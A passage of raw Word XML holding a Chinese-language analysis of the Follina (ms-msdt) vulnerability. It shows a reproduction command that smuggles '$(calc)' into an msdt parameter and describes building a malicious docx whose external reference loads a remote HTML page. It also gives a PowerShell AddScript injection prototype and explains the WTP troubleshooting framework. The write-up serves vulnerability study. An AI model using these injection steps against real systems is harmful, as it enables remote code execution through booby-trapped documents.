          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如下</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554B3DA8" w14:textId="5C45C22E" w:rsidR="00E8378B" w:rsidRDefault="00E8378B" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="679DC947" wp14:editId="702CB15E">
            <wp:extent cx="6249244" cy="3419475"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="10" name="图片 10" descr="https://img2022.cnblogs.com/blog/1011569/202206/1011569-20220602181156832-732887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2.cnblogs.com/blog/1011569/202206/1011569-20220602181156832-73288782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2780" cy="3421410"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBE16F4" w14:textId="7AA31D14" w:rsidR="008E0839" w:rsidRDefault="005B045E" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="005B045E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>当然，还有一种最简单的复现方法，就是命令行直接执行：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t xml:space="preserve">:/id </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>PCWDiagnostic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t xml:space="preserve"> /skip force /param "</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>IT_RebrowseForFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t xml:space="preserve">=? </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>IT_LaunchMethod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>ContextMenu</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>IT_BrowseForFile</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>=</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>/..</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="005B045E">
        <w:t>/../$(calc)/.exe"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9362AB" w14:textId="57D27CCE" w:rsidR="008E0839" w:rsidRDefault="0022354D" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="0022354D">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="410AC7D2" wp14:editId="49C3D06F">
            <wp:extent cx="5274310" cy="1995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5170"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="15114E91" w14:textId="77777777" w:rsidR="008E0839" w:rsidRDefault="008E0839" w:rsidP="00713A03">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1EE5C756" w14:textId="4E7A8BDF" w:rsidR="00601F47" w:rsidRDefault="007E72EB" w:rsidP="00601F47">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00266C47">
        <w:rPr>
          <w:rStyle w:val="22"/>
          <w:bCs/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t>漏洞分析</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E54DA07" w14:textId="4B6B97DE" w:rsidR="006D79E3" w:rsidRDefault="003D57C1" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>在</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>中可知</w:t>
      </w:r>
      <w:r w:rsidRPr="003D57C1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>主要就是两处，一处是改</w:t>
      </w:r>
      <w:r w:rsidRPr="003D57C1">
        <w:t>word的word/_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D57C1">
        <w:t>rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D57C1">
        <w:t>目录下新添加一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D57C1">
        <w:t>document.xml.rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D57C1">
        <w:t>文件，里面是一个</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="003D57C1">
        <w:t>windows.location.href</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="003D57C1">
        <w:t>加载远程连接</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79ADEA80" w14:textId="200A1BF3" w:rsidR="00D25DF5" w:rsidRDefault="00D25DF5" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39DF8F67" w14:textId="3E62FD26" w:rsidR="00D25DF5" w:rsidRPr="00D25DF5" w:rsidRDefault="00D25DF5" w:rsidP="00D25DF5">
      <w:pPr>
        <w:widowControl/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D25DF5">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:noProof/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="27566EA6" wp14:editId="75779FC5">
            <wp:extent cx="6143625" cy="3363683"/>
            <wp:effectExtent l="0" t="0" r="0" b="8255"/>
            <wp:docPr id="8" name="图片 8" descr="C:\Users\nsfocus\AppData\Roaming\Tencent\Users\1152988120\QQ\WinTemp\RichOle\N3S5JRV($4FLGD6CTUT8L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focus\AppData\Roaming\Tencent\Users\1152988120\QQ\WinTemp\RichOle\N3S5JRV($4FLGD6CTUT8LK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5644" cy="3375738"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EDEFF09" w14:textId="3A59BC1D" w:rsidR="00D25DF5" w:rsidRDefault="00D25DF5" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25DF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>远程</w:t>
      </w:r>
      <w:r w:rsidRPr="00D25DF5">
        <w:t>html中放着</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00D25DF5">
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00D25DF5">
        <w:t>:/协议写的HTML</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F9280B3" w14:textId="0EAE7B08" w:rsidR="00D25DF5" w:rsidRDefault="00D25DF5" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25DF5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56B28D4A" wp14:editId="2739ED55">
            <wp:extent cx="6332690" cy="1371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4951" cy="1380753"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0AB4AC" w14:textId="46821D66" w:rsidR="006D79E3" w:rsidRDefault="00D25DF5" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00D25DF5">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>最后将文件压缩打包成</w:t>
      </w:r>
      <w:r w:rsidRPr="00D25DF5">
        <w:t>docx。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308DEEE6" w14:textId="5012BA21" w:rsidR="006D79E3" w:rsidRDefault="006D79E3" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="797B7640" w14:textId="22433C05" w:rsidR="006D79E3" w:rsidRDefault="00473133" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00473133">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0A7B30AA" wp14:editId="3306ADB8">
            <wp:extent cx="4591691" cy="20195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2019582"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="08624CEF" w14:textId="4F793269" w:rsidR="00473133" w:rsidRDefault="00473133" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="00473133">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>分析</w:t>
      </w:r>
      <w:r w:rsidRPr="00473133">
        <w:t>word的目录结构，了解到Word/document.xml 是文件的内容</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CAFD5F4" w14:textId="77777777" w:rsidR="00473133" w:rsidRDefault="00473133" w:rsidP="00473133">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>[Content_Types].xml存储的是part名称和类型</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="778FC2AE" w14:textId="10AFC830" w:rsidR="00473133" w:rsidRDefault="00473133" w:rsidP="00473133">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>每一个</w:t>
      </w:r>
      <w:r>
        <w:t>part是一个xml，part如果引用外部文件就需要在当前目录下创建一个_</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件夹，下面存放外部引用的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>文件，</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>poc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>中就是用了document.xml的外部引用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ECD94AE" w14:textId="0DEA6873" w:rsidR="006D79E3" w:rsidRDefault="006D79E3" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="006D79E3">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果想要文件内容是自定义的，即自创建模板，可以修改</w:t>
      </w:r>
      <w:r w:rsidRPr="006D79E3">
        <w:t>document.xml</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74B5B693" w14:textId="58ABC934" w:rsidR="005905C2" w:rsidRPr="006D79E3" w:rsidRDefault="005905C2" w:rsidP="006D79E3">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="005905C2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>然后对应的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="005905C2">
        <w:t>xxx.xml.rels</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="005905C2">
        <w:t>文件中添加外部引用的一行，注意rid对应</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B4115C0" w14:textId="562252CC" w:rsidR="00C50A46" w:rsidRDefault="008D52F5" w:rsidP="00C50A46">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="008D52F5">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78D80803" wp14:editId="19084B5F">
            <wp:extent cx="6619365" cy="1190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138" cy="1191484"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCF4575" w14:textId="49F32843" w:rsidR="00F53B12" w:rsidRDefault="00F53B12" w:rsidP="00C50A46">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞的原有是因为:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79D85B9C" w14:textId="09469F04" w:rsidR="00F53B12" w:rsidRDefault="00F53B12" w:rsidP="00C50A46">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F53B12">
        <w:lastRenderedPageBreak/>
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F53B12">
        <w:t xml:space="preserve">:// </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00F53B12">
        <w:t>伪协议过程里最终</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00F53B12">
        <w:t>由于</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00F53B12">
        <w:t>PowerShell.AddScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00F53B12">
        <w:t>()导致的PS代码注入漏洞导致的，漏洞原型可以理解为：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67286F47" w14:textId="77777777" w:rsidR="00F53B12" w:rsidRDefault="00F53B12" w:rsidP="00F53B12">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">PowerShell </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powerShellCommand</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PowerShell.Create</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1541DDE6" w14:textId="77777777" w:rsidR="00F53B12" w:rsidRDefault="00F53B12" w:rsidP="00F53B12">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powerShellCommand.AddScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>("ls -test $(</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>iex</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>('mspaint.exe'))");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AEF909F" w14:textId="1B1F4B6E" w:rsidR="00F53B12" w:rsidRDefault="00F53B12" w:rsidP="00F53B12">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">var result = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>powerShellCommand.Invoke</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="230AD2A2" w14:textId="04361CE0" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00F53B12">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2AFE80AA" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00F53B12">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AF91A23" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRPr="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2542">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>WTP框架</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="052FEA48" w14:textId="35BF3A8E" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>WTP的底层构成</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A3B712C" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>WTP由两个进程组成，Process1 是带UI 的 Troubleshooting Run-time Engine，Process2 用于提供 Windows PowerShell Runtime 环境</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB921E1" w14:textId="7571747B" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>Process2 提供的 PowerShell 运行时环境提供了4条特殊的 PowerShell 命令：Get-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DiagInput</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Update-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DiagReport</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Update-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DiagRootCause</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, Write-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>DiagProgress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0B3F5D9F" w14:textId="713F51BD" w:rsidR="00F53B12" w:rsidRDefault="00F53B12" w:rsidP="00C50A46">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="744A8BDD" w14:textId="152EDE6D" w:rsidR="00EA2542" w:rsidRPr="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2542">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>工作原理为</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE48CC7" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>简单来说，</w:t>
      </w:r>
      <w:r>
        <w:t>Process1（Troubleshooting Run-time Engine）通过故障排除包检测问题，查出问题交给Process2 （PowerShell ）去处理。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CF992EC" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>Process1 就是 msdt.exe ，Process2 则是 sdiagnhost.exe。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D863F79" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:t>sdiagnhost.exe 为了给msdt.exe 提供运行脚本的能力，注册了</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>IScriptedDiagnosticHost</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> com接口，相应的com方法就是：</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>RunScript</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>()。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="523DF9B2" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>故障排除包的设计基于三个步骤：检测问题（</w:t>
      </w:r>
      <w:r>
        <w:t>troubleshooting）、解决问题</w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>（resolution）和验证解决方案（verification），对应 TS_、RS_、VF_ 三种脚本。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="252FA50A" w14:textId="70DD5588" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>故障排除包是用户可编程部分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626DAF85" w14:textId="77777777" w:rsidR="00EA2542" w:rsidRPr="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EA2542">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>漏洞形成原因</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEDD1D0" w14:textId="651C9938" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">WTP 还提供了一系列的默认故障排除包，可以在 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms-msdt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 协议里通过 -id 参数指定。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9569F6" w14:textId="0B2D942D" w:rsidR="00EA2542" w:rsidRDefault="00EA2542" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>本次漏洞中所使用的</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>PCWDiagnostic</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 就是其中之一，用于程序兼容性的故障排除。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E1B054C" w14:textId="57987743" w:rsidR="0088648A" w:rsidRDefault="0088648A" w:rsidP="0088648A">
      <w:pPr>
        <w:pStyle w:val="21"/>
      </w:pPr>
      <w:r w:rsidRPr="007D48E0">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>从</w:t>
      </w:r>
      <w:r w:rsidRPr="007D48E0">
        <w:t xml:space="preserve"> Word 等调用应用程序使用 URL 协议调用 MSDT</w:t>
      </w:r>
      <w:r w:rsidR="00EC43BA">
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00EC43BA">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>触发漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E9A3CCA" w14:textId="314681C7" w:rsidR="0088648A" w:rsidRDefault="0022613E" w:rsidP="00EA2542">
      <w:pPr>
        <w:pStyle w:val="21"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0022613E">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>漏洞触发的路径有</w:t>
      </w:r>
      <w:r w:rsidRPr="0022613E">
        <w:t>msdt.exe – &gt; sdiagnhost.exe-&gt;TS_ProgramCompatibilityWizard.ps1 来调用。</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w14:paraId="3C341C78" w14:textId="2D981F8E" w:rsidR="00441C22" w:rsidRPr="007E72EB" w:rsidRDefault="00441C22" w:rsidP="00A201BE">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r w:rsidRPr="007E72EB">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
